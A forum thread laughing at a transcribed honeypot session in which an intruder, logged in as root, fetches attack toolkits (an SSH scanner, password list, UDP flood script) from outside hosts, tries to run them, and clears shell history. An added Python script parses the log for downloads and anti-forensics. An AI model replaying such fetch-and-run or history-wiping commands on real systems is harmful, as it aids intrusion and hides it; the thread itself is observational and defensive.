Honeypot wtf



  •  For some reason this seems funny to me.



  • www2:~# w
     09:06:10 up 14 days,  3:53,  1 user,  load average: 0.08, 0.02, 0.01
    USER     TTY     FROM               LOGIN@   IDLE   JCPU   PCPU WHAT
    root     pts/0   10.34.18.5         09:06    0.00s  0.00s  0.00s w
    www2:~# wget
    wget: missing URL
    Usage: wget [OPTION]... [URL]...
    
    Try `wget --help' for more options.
    www2:~# wget http://fakehlds.com/fakehlds32.tar.gz
    --2011-01-20 09:06:22--  http://fakehlds.com/fakehlds32.tar.gz
    Connecting to fakehlds.com:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 148729 (145K) [application/x-gzip]
    Saving to: `fakehlds32.tar.gz
    
    100%[======================================>] 148,729      2K/s  eta 55s
    
    2011-01-20 09:06:24 (2 KB/s) - `fakehlds32.tar.gz' saved [148729/148729]
    www2:~# sudo apt-get install ruby1.8 libopenssl-ruby1.8
    bash: sudo: command not found
    www2:~# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz
    ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz: Unsupported scheme.
    www2:~# ls -a
    .                 ..                .debtags          .viminfo
    .aptitude         .profile          .bashrc           fakehlds32.tar.gz
    www2:~# wget http://203.128.7.10/~admin/ka.tar
    --2011-01-20 09:07:21--  http://203.128.7.10/~admin/ka.tar
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 4884480 (4M) [application/x-tar]
    Saving to: `ka.tar
    
    100%[======================================>] 4,884,480    446K/s  eta 0s
    
    2011-01-20 09:07:33 (446 KB/s) - `ka.tar' saved [4884480/4884480]
    www2:~# tar xvf ka.tar
    a/1
    a/2
    a/3
    a/4
    a/5
    a/a
    a/common
    a/gen-pass.sh
    a/go.sh
    a/pass_file
    a/pscan2
    a/scam
    a/secure
    a/ss
    a/ssh-scan
    a/vuln.txt
    www2:~# rm -rf ka.tar
    www2:~# cd /var/spool/samba/a
    bash: cd: /var/spool/samba/a: No such file or directory
    www2:~# cd /var/spool/samba
    bash: cd: /var/spool/samba: No such file or directory
    www2:~# cd /var
    www2:/var# cd /spool
    bash: cd: /spool: No such file or directory
    www2:/var# cd /samba
    bash: cd: /samba: No such file or directory
    www2:/var# cd /a
    bash: cd: /a: No such file or directory
    www2:/var# cd a
    bash: cd: a: No such file or directory
    www2:/var# cd spool
    www2:/var/spool# cd samba
    bash: cd: samba: No such file or directory
    www2:/var/spool# cd a
    bash: cd: a: No such file or directory
    www2:/var/spool# chmod +x *
    www2:/var/spool# ./go.sh 92
    bash: ./go.sh: command not found
    www2:/var/spool# wget http://203.128.7.10/~admin/udppl.tar
    --2011-01-20 09:09:19--  http://203.128.7.10/~admin/udppl.tar
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 10240 (10K) [application/x-tar]
    Saving to: `udppl.tar
    
    100%[======================================>] 10,240       3K/s  eta 2s
    
    2011-01-20 09:09:20 (3 KB/s) - `udppl.tar' saved [10240/10240]
    www2:/var/spool# tar xvf udppl.tar
    udp/udp.pl
    www2:/var/spool# chmod +x *
    www2:/var/spool# perl udp.pl
    bash: perl: command not found
    www2:/var/spool# wget http://203.128.7.10/~admin/k08.tgz
    --2011-01-20 09:09:51--  http://203.128.7.10/~admin/k08.tgz
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    www2:/var/spool# cd udp
    www2:/var/spool/udp# perl
    bash: perl: command not found
    www2:/var/spool/udp# udp.pl
    bash: udp.pl: command not found
    www2:/var/spool/udp# wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe
    --2011-01-20 09:10:20--  http://download.microsoft.com/download/win2000platform/
    SP/SP3/NT5/EN-US/W2Ksp3.exe
    Connecting to download.microsoft.com:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]
    Saving to: `W2Ksp3.exe
    
    100%[======================================>] 130,978,672  5225K/s  eta 0s
    
    2011-01-20 09:10:45 (5225 KB/s) - `W2Ksp3.exe' saved [130978672/130978672]
    www2:/var/spool/udp# wget http://203.128.7.10/~admin/k08.tgz
    --2011-01-20 09:11:00--  http://203.128.7.10/~admin/k08.tgz
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 404 Not Found
    www2:/var/spool/udp# wget http://203.128.7.10/~admin/udppl.tar
    --2011-01-20 09:11:11--  http://203.128.7.10/~admin/udppl.tar
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 10240 (10K) [application/x-tar]
    Saving to: `udppl.tar
    
    100%[======================================>] 10,240       4K/s  eta 1s
    
    2011-01-20 09:11:12 (4 KB/s) - `udppl.tar' saved [10240/10240]
    www2:/var/spool/udp# tar xvf udppl.tar
    udp/udp.pl
    www2:/var/spool/udp# ls -a
    .          ..         udp.pl     W2Ksp3.exe udppl.tar  udp
    www2:/var/spool/udp# cd udp
    www2:/var/spool/udp/udp# chmod +x *
    www2:/var/spool/udp/udp# perl udp.pl
    bash: perl: command not found
    www2:/var/spool/udp/udp# wget http://203.128.7.10/~admin/ka.tar
    --2011-01-20 09:12:13--  http://203.128.7.10/~admin/ka.tar
    Connecting to 203.128.7.10:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 4884480 (4M) [application/x-tar]
    Saving to: `ka.tar
    
    100%[======================================>] 4,884,480    591K/s  eta 0s
    
    2011-01-20 09:12:21 (591 KB/s) - `ka.tar' saved [4884480/4884480]
    www2:/var/spool/udp/udp# tar xvf ka.tar
    a/1
    a/2
    a/3
    a/4
    a/5
    a/a
    a/common
    a/gen-pass.sh
    a/go.sh
    a/pass_file
    a/pscan2
    a/scam
    a/secure
    a/ss
    a/ssh-scan
    a/vuln.txt
    www2:/var/spool/udp/udp# rm -rf ka.tar
    www2:/var/spool/udp/udp# 213.248.54.246
    bash: 213.248.54.246: command not found
    www2:/var/spool/udp/udp# cd /var/spool/samba
    bash: cd: /var/spool/samba: No such file or directory
    www2:/var/spool/udp/udp# cd /var/spool/samba/a
    bash: cd: /var/spool/samba/a: No such file or directory
    www2:/var/spool/udp/udp# cd /var/spool
    www2:/var/spool# cd samba
    bash: cd: samba: No such file or directory
    www2:/var/spool# cd ". "
    bash: cd: . : No such file or directory
    www2:/var/spool# cd a
    bash: cd: a: No such file or directory
    www2:/var/spool# cd /a
    bash: cd: /a: No such file or directory
    www2:/var/spool# ifconfig
    eth0      Link encap:Ethernet  HWaddr 00:4c:a8:ab:32:f4
              inet addr:10.98.55.4  Bcast:10.98.55.255  Mask:255.255.255.0
              inet6 addr: fe80::21f:c6ac:fd44:24d7/64 Scope:Link
              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
              RX packets:84045991 errors:0 dropped:0 overruns:0 frame:0
              TX packets:103776307 errors:0 dropped:0 overruns:0 carrier:2
              collisions:0 txqueuelen:1000
              RX bytes:50588302699 (47.1 GiB)  TX bytes:97318807157 (90.6 GiB)
    
    lo        Link encap:Local Loopback
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:16436  Metric:1
              RX packets:308297 errors:0 dropped:0 overruns:0 frame:0
              TX packets:308297 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:355278106 (338.8 MiB)  TX bytes:355278106 (338.8 MiB)
    www2:/var/spool#cd /var/spool/samba
    bash: cd: /var/spool/samba: No such file or directory
    www2:/var/spool# wget http://fakehlds.com/fakehlds64.tar.gz
    --2011-01-20 09:16:25--  http://fakehlds.com/fakehlds64.tar.gz
    Connecting to fakehlds.com:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 150995 (147K) [application/x-gzip]
    Saving to: `fakehlds64.tar.gz
    
    100%[======================================>] 150,995      18K/s  eta 7s
    
    2011-01-20 09:16:26 (18 KB/s) - `fakehlds64.tar.gz' saved [150995/150995]
    www2:/var/spool# sudo apt-get install ruby1.8 libopenssl-ruby1.8
    bash: sudo: command not found
    www2:/var/spool# wget ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz
    ftp://ftp.ruby-lang.org/pub/ruby/1.8/ruby-1.8.7-p72.tar.gz: Unsupported scheme.
    www2:/var/spool# cd ruby-1.8.7-p72
    bash: cd: ruby-1.8.7-p72: No such file or directory
    www2:/var/spool# tar xzvf ruby-1.8.7-p72.tar.gz
    tar: ruby-1.8.7-p72.tar.gz: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error exit delayed from previous errors
    www2:/var/spool# ls -a
    .                 ..                mail              udppl.tar
    udp               fakehlds64.tar.gz
    www2:/var/spool# perl
    bash: perl: command not found
    www2:/var/spool# wget ely.uv.ro/scan.tar.gz
    --2011-01-20 09:18:18--  http://ely.uv.ro/scan.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool#  wget ely.uv.ro/john.tar.gz
    --2011-01-20 09:18:34--  http://ely.uv.ro/john.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget http://bodylanguage.uv.ro/unixcod.tar.gz
    --2011-01-20 09:18:55--  http://bodylanguage.uv.ro/unixcod.tar.gz
    Connecting to bodylanguage.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget www.shoarec.go.ro/udp.pl
    --2011-01-20 09:19:12--  http://www.shoarec.go.ro/udp.pl
    Connecting to shoarec.go.ro:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: `udp.pl
    
    100%[======================================>] 0            2K/s  eta -1s
    
    2011-01-20 09:19:14 (2 KB/s) - `udp.pl' saved [19017/0]
    www2:/var/spool# wget ely.uv.ro/emech.tar.gz
    --2011-01-20 09:19:33--  http://ely.uv.ro/emech.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/emech.tar.gz;
    --2011-01-20 09:19:37--  http://ely.uv.ro/emech.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/radiobsd.tar.gz
    --2011-01-20 09:20:09--  http://ely.uv.ro/radiobsd.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# wget ely.uv.ro/radiobsd.tar.gz
    --2011-01-20 09:30:51--  http://ely.uv.ro/radiobsd.tar.gz
    Connecting to ely.uv.ro:80... connected.
    HTTP request sent, awaiting response... 403 Forbidden
    www2:/var/spool# history -c
    www2:/var/spool# exit
    
    Connection to server closed.
    localhost:~# exit
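
A triage pass over a transcript in the format above, as an added example that is not part of the original post: it splits the session into command/output records and pulls out the fetch attempts with their HTTP status, the binaries the shell reported as missing, and the history wipe. The function names and report keys are assumptions of this sketch, and `SAMPLE` is a short excerpt assembled from lines of the transcript.

```python
import re

# Prompt lines look like "www2:/var/spool# wget ..." (host:cwd# command).
PROMPT = re.compile(r"^\s*(?P<host>[\w.-]+):(?P<cwd>[~/][^#\s]*)#\s*(?P<cmd>.*)$")
HTTP_STATUS = re.compile(r"awaiting response\.\.\. (\d{3})")
NOT_FOUND = re.compile(r"^bash: (\S+): command not found")

# Excerpt assembled from the transcript above (not a new capture).
SAMPLE = """\
www2:~# sudo apt-get install ruby1.8 libopenssl-ruby1.8
bash: sudo: command not found
www2:~# wget http://203.128.7.10/~admin/ka.tar
--2011-01-20 09:07:21--  http://203.128.7.10/~admin/ka.tar
Connecting to 203.128.7.10:80... connected.
HTTP request sent, awaiting response... 200 OK
www2:/var/spool# perl udp.pl
bash: perl: command not found
www2:/var/spool# wget ely.uv.ro/scan.tar.gz
--2011-01-20 09:18:18--  http://ely.uv.ro/scan.tar.gz
HTTP request sent, awaiting response... 403 Forbidden
www2:/var/spool# history -c
"""

def parse_session(text):
    """Return one record per prompt line: working dir, command, output lines."""
    records = []
    for line in text.splitlines():
        m = PROMPT.match(line)
        if m:
            records.append({"cwd": m["cwd"], "cmd": m["cmd"].strip(), "out": []})
        elif records and line.strip():
            records[-1]["out"].append(line.strip())
    return records

def triage(records):
    """Collect fetch attempts, commands the shell could not find, history wipes."""
    report = {"downloads": [], "not_found": set(), "anti_forensics": []}
    for rec in records:
        argv = rec["cmd"].rstrip(";").split()
        if not argv:
            continue
        if argv[0] == "wget" and len(argv) > 1:
            codes = [int(m.group(1)) for l in rec["out"] if (m := HTTP_STATUS.search(l))]
            # URL exactly as typed; None means no HTTP response was logged.
            report["downloads"].append((argv[-1], codes[-1] if codes else None))
        for l in rec["out"]:
            if (m := NOT_FOUND.match(l)):
                report["not_found"].add(m.group(1))
        if argv[:2] == ["history", "-c"]:
            report["anti_forensics"].append(rec["cmd"])
    return report

if __name__ == "__main__":
    print(triage(parse_session(SAMPLE)))
```

A command that wraps onto a second line, as the W2Ksp3.exe URL does in the transcript, has to be rejoined before parsing, otherwise the continuation is counted as output.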


  • @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform /SP/SP3/NT5/EN-US/W2Ksp3.exe
    Connecting to download.microsoft.com:80... connected.
    HTTP request sent, awaiting response... 200 OK Length: 130978672 (124M) [application/octet-stream]
    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.



  • @El_Heffe said:

    @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe

    Connecting to download.microsoft.com:80... connected.

    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]

    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.

    Could be to test the internet speed, maybe? I mean, he can't seriously think it's of any use on Linux, can he..? Nobody's THAT stupid.



  • @Evo said:

    @El_Heffe said:

    @anotherusername said:

    wget http://download.microsoft.com/download/win2000platform
    /SP/SP3/NT5/EN-US/W2Ksp3.exe

    Connecting to download.microsoft.com:80... connected.

    HTTP request sent, awaiting response... 200 OK
    Length: 130978672 (124M) [application/octet-stream]

    Saving to: `W2Ksp3.exe

    So . . .  he downloaded Windows 2000 Service Pack 3.

    In 2011.

     

    Wow.

    Could be to test the internet speed, maybe? I mean, he can't seriously think it's of any use on Linux, can he..? Nobody's THAT stupid.

    Actually, my favourite part was the complete ignorance of how paths work. Lots and lots and lots of cd commands... with/without a leading slash (obviously doesn't have a clue what that means), removing/adding subfolders to the path because the first cd didn't work, etc...

    (That, or the 6pt font that showed up when I first tried posting the <pre> block.)



  • @Evo said:

    Nobody's THAT stupid.
     

    He gave up trying to install ruby because there is no sudo. All that while logged in as root.

    He uncompressed his files at /root, then changed to /var/spool/apache (WTF distro has that dir?) to use them.

     



  • @Mcoder said:

    @Evo said:

    Nobody's THAT stupid.
     

    He gave up trying to install ruby because there is no sudo. All that while logged in as root.

    He uncompressed his files at /root, then changed to /var/spool/apache (WTF distro has that dir?) to use them.

     

    It was /var/spool/samba. Apparently the cheat sheet he was following assumed that /var/spool/samba was the current path, because then he tried to cd /var/spool/samba/a, which was supposed to be what he just unpackaged with tar.



  •  ...
    perl? not found
    try to download file
    perl? not found
    perl? not found
    download w2ksp3
    download file
    look at directory
    change permissions on directory
    perl? not found
    extract file
    ip address
    wrong directory
    wrong directory
    wrong directory
    ...
    check ethernet settings
    same wrong directory
    download another file
    try to install ruby
    perl? not found
    ...

     

    Someone in the comments said that w2k was probably a speed test, but I still don't see what that is supposed to do for 403 errors or perl not existing.

     

    In other news how did you get the text?



  • @Chame1eon said:

    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".



  •  @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.



  • @Chame1eon said:

     @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it. Oh, and I obviously had nothing better to do.



  • @anotherusername said:

    @Chame1eon said:

     @anotherusername said:

    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".

     I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it.
     

    That makes sense.

     



  • @Chame1eon said:

    @anotherusername said:
    @Chame1eon said:
    @anotherusername said:
    @Chame1eon said:
    In other news how did you get the text?
    My laptop came with a newfangled accessory called a "keyboard".
    I didn't consider typing the whole thing.  Maybe I am lazy.

    The video was going too quickly for me to really catch what was going on, and I was originally considering asking people to explain it and figured a transcript would be useful. Turns out that once I slowed it down, I didn't need to ask anyone what happened, but I figured the transcript would still be useful for quotable purposes so I went ahead and posted it.
     

    That makes sense.

     

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     



  • @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.



  • @Ronald said:

    @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.

    Can't view that on mobile. Knowing my luck if I could be bothered to get up and fire up the old puter it would be blocked in my country.



  • @Zemm said:

    @Ronald said:
    @El_Heffe said:

    He watched the video and typed up a transcript of the whole thing?

    Wow, and I thought I led a boring life.

     

    Maybe you need a bit of Excel road rage to spice up that boring life.

    Can't view that on mobile. Knowing my luck if I could be bothered to get up and fire up the old puter it would be blocked in my country.

    If you picture a VB game embedded in Excel, you'll pretty much have the idea.

    I never much liked putting VB inside Excel spreadsheets. It feels dirty and oh-so-wrong. The only spreadsheet I've done that to had to pull a page from the Internet and screen scrape some values off it, and Excel's built-in data import wizard was woefully inadequate for the task. And if the security settings didn't allow scripting (which the default won't), everything on the spreadsheet still worked except for the button that pulled those values.



  • @anotherusername said:

    If you picture a VB game embedded in Excel, you'll pretty much have the idea.

    If only we could still harness the power of the flight simulator in Excel 97, all would be right.

